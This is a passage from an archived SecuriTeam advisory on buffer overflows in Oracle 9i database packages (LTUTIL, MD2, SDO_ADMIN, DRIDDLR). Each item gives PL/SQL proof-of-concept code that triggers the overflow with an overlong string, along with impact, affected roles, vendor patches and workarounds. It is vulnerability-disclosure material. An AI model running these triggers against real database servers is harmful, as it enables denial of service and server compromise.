This vulnerability can be exploited by members of SYSDBA role and users 
granted execute permissions on DBMS_REPCAT_UTL package.
Exploitation of this vulnerability allows an attacker to execute arbitrary 
code. It can also be exploited to cause DOS (Denial of service) killing 
Oracle server process.

Vendor Fix:
Fixed in Patchset 4 (9.2.0.5). 10g Not vulnerable.

#40 - Buffer overflow in procedure PUSHDEFERREDTXNS of LTUTIL package
Details:
When PUSHDEFERREDTXNS procedure is called with a long string in the 
REPGRPNAME parameter a buffer overflow occurs.

To reproduce the overflow, execute the next PL/SQL:

DECLARE
P_REPGRPNAME VARCHAR2(32767);
AAA VARCHAR2(32767);
BEGIN
AAA:='A';
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA || AAA;
P_REPGRPNAME := AAA;
SYS.LTUTIL.PUSHDEFERREDTXNS(REPGRPNAME => P_REPGRPNAME);
END;

Analysis:
This vulnerability can be exploited by members of WMSYS or SYSDBA role and 
users granted execute permissions on LTUTIL package.
Exploitation of this vulnerability allows an attacker to execute arbitrary 
code. It can also be exploited to cause DOS (Denial of service) killing 
Oracle server process.

Vendor Fix:
Fixed in Patchset 4 (9.2.0.5). 10g Not vulnerable.

#41 - Buffer overflow in public procedure SDO_CODE_SIZE of MD2 package
Details:
When SDO_CODE_SIZE procedure is called with a long string in the LAYER 
parameter a buffer overflow occurs.

To reproduce the overflow, execute the next PL/SQL:

DECLARE a BINARY_INTEGER; -- return value
BEGIN
a := MDSYS.MD2.SDO_CODE_SIZE (LAYER => 'longstring');
END;

Analysis:
By default SDO_CODE_SIZE has EXECUTE permission to PUBLIC so any Oracle 
database user can exploit this vulnerability.
Exploitation of this vulnerability allows an attacker to execute arbitrary 
code. It can also be exploited to cause DOS (Denial of service) killing 
Oracle server process.

Vendor Fix:
Fixed in Patchset 4 (9.2.0.5). Fixed in 10g (10.1.0.2) Patch 2.

#42 - Buffer overflow in public procedure VALIDATE_GEOM of MD2 package
Details:
When VALIDATE_GEOM procedure is called with a long string in the LAYER 
parameter a buffer overflow occurs.

To reproduce the overflow, execute the next PL/SQL:

DECLARE a VARCHAR2(32767); -- return value
BEGIN
a := MDSYS.MD2.VALIDATE_GEOM (LAYER => 'longstring', GID => 1, ESEQ => 1);
END;

Analysis:
By default VALIDATE_GEOM has EXECUTE permission to PUBLIC so any Oracle 
database user can exploit this vulnerability.
Exploitation of this vulnerability allows an attacker to execute arbitrary 
code. It can also be exploited to cause DOS (Denial of service) killing 
Oracle server process.

Vendor Fix:
Fixed in Patchset 4 (9.2.0.5). Fixed in 10g (10.1.0.2) Patch 2.

#43 - Buffer overflow in public procedure SDO_CODE_SIZE of SDO_ADMIN 
package
Details:
When SDO_CODE_SIZE procedure is called with a long string in the LAYER 
parameter a buffer overflow occurs.

To reproduce the overflow, execute the next PL/SQL:

DECLARE a BINARY_INTEGER; -- return value
BEGIN
a := MDSYS.SDO_ADMIN.SDO_CODE_SIZE (LAYER => 'longstring');
END;

Analysis:
By default SDO_CODE_SIZE has EXECUTE permission to PUBLIC so any Oracle 
database user can exploit this vulnerability.
Exploitation of this vulnerability allows an attacker to execute arbitrary 
code. It can also be exploited to cause DOS (Denial of service) killing 
Oracle server process.

Vendor Fix:
Fixed in Patchset 4 (9.2.0.5). Fixed in 10g (10.1.0.2) Patch 2.

#44 - Buffer overflow in procedure SUBINDEXPOPULATE of DRIDDLR package
Details:
When SUBINDEXPOPULATE procedure is called with a long string in the 
LOGFILE parameter a buffer overflow occurs.

To reproduce the overflow, execute the next PL/SQL:

DECLARE
P_INDEXID NUMBER;
P_SLAVEID NUMBER;
P_OPCODE NUMBER;
P_LOGFILE VARCHAR2(32767);
P_IDXMEM NUMBER;
AAA VARCHAR2(32767);
BEGIN
AAA:='A';
AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA; 
AAA:=AAA || AAA;
AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA; 
AAA:=AAA || AAA;
AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA;
P_INDEXID := 1;
P_SLAVEID := 1;
P_OPCODE := 1;
P_LOGFILE := AAA;
P_IDXMEM := 1;
CTXSYS.DRIDDLR.SUBINDEXPOPULATE(INDEXID => P_INDEXID, SLAVEID => 
P_SLAVEID, OPCODE => P_OPCODE, LOGFILE => P_LOGFILE, IDXMEM => P_IDXMEM);
END;

Analysis:
This vulnerability can be exploited by members of SYSDBA role and users 
granted execute permissions on DRIDDLR package.
Exploitation of this vulnerability allows an attacker to execute arbitrary 
code. It can also be exploited to cause DOS (Denial of service) killing 
Oracle server process.

Vendor Fix:
Fixed in Patchset 4 (9.2.0.5) Patch 3. 10g Release 1 not vulnerable.

Comments:
Exploitation of these vulnerabilities will allow an attacker to completely 
compromise the OS and the database if Oracle is running on Windows 
platform, because Oracle must run under the local System account or under 
an administrative account. If Oracle is running on *nix then only the 
database would be compromised because Oracle runs mostly under oracle user 
which has restricted permissions.

Workaround:
 * Check packages permissions and remove public permissions. Set minimal 
permissions that fit your needs
 * Restrict users to execute PL/SQL statements directly over the server
 * Periodically audit user permissions on all database objects
 * Lock users that aren't used
 * Change default passwords
 * Keep Oracle up to date with patches

Vendor Contact:
Vendor was contacted and has released fixes. Please click on each 
vulnerability to see details.

Solution:
For additional information, the official advisory from Oracle Corporation 
can be downloaded from:  
<http://www.oracle.com/technology/deploy/security/pdf/2004alert68.pdf> 
http://www.oracle.com/technology/deploy/security/pdf/2004alert68.pdf


ADDITIONAL INFORMATION

The information has been provided by  <mailto:shatter@appsecinc.com> Cesar 
Cerrudo and Esteban Martinez Fayo of Application Security, Inc.
The original article can be found at:  
<http://www.appsecinc.com/resources/alerts/oracle/2004-0001/> 
http://www.appsecinc.com/resources/alerts/oracle/2004-0001/



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages.
<Prev in Thread]	Current Thread	[Next in Thread>
[NEWS] Multiple Vulnerabilities in Oracle Database Server (40 Issues), SecuriTeam <=
Previous by Date:	[NT] Chat Anywhere DoS, SecuriTeam
Next by Date:	[NT] Xedus Webserver Directory Traversal and DoS, SecuriTeam
Previous by Thread:	[NT] Chat Anywhere DoS, SecuriTeam
Next by Thread:	[NT] Xedus Webserver Directory Traversal and DoS, SecuriTeam
Indexes:	[Date] [Thread] [Top] [All Lists]